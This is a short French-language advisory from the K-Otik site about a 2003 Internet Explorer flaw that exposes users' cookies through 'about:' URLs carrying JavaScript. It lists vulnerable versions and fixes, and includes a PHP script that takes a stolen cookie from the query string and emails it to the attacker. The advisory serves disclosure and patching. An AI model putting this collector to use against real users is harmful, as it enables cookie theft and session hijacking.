Microsoft Internet Explorer Remote Cookies Retrieval

 Date de Publication: 2003-06-10
 Titre: Microsoft Internet Explorer
Remote Cookies Retrieval
 K-Otik ID : 0164
 Exploitable à distance : Oui
 Exploitable en local : Oui
 

 
 

 * Description Technique - Exploit *
 
Cette vulnérabilité est liée à
Microsoft IE Cookies Exposure exploitable grâce à l'url "About" avec inclusion de tags javascript. elle permettrait à un attaquant distant de récupérer les cookies d'un utilisateur surfant avec une version non patchée de IE (pour les détails techniques cf. Références).

Récupération du cookie par mail :

[?php
$test2 = getenv("QUERY_STRING");
$msg = "\t NSRG - 05 - 9 \n
\tCOOKIE: $test2 \n
\tTHIS IS THE COOKIE CONTENT RETRIEVED TROUGH THE NSRG-05-9 REPORT \n";
$recipient = "";
$subject = "REMOTE COOKIEL RETRIEVAL TROUGH PHP NSRG-05-9";
$mailheaders = "From: NSRG PHP File \n";
$mailheaders .= "Reply-To: anybody\n\n";
mail($recipient, $subject, $msg, $mailheaders);
?]

  * Versions Vulnérables *

IE 6.0.2600.x (sans SP1)
IE 5.0.x (non patché)



  * Solution *


Désactiver les cookies.

Appliquer les patchs et les service-packs.


  * Références *

http://security.novappc.com/nsrg-05-9/nsrg-05-9.txt


  * Crédits *
 
Failles découverte par
Lorenzo Hernandez Garcia-Hierro (Juin 2003).

 

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits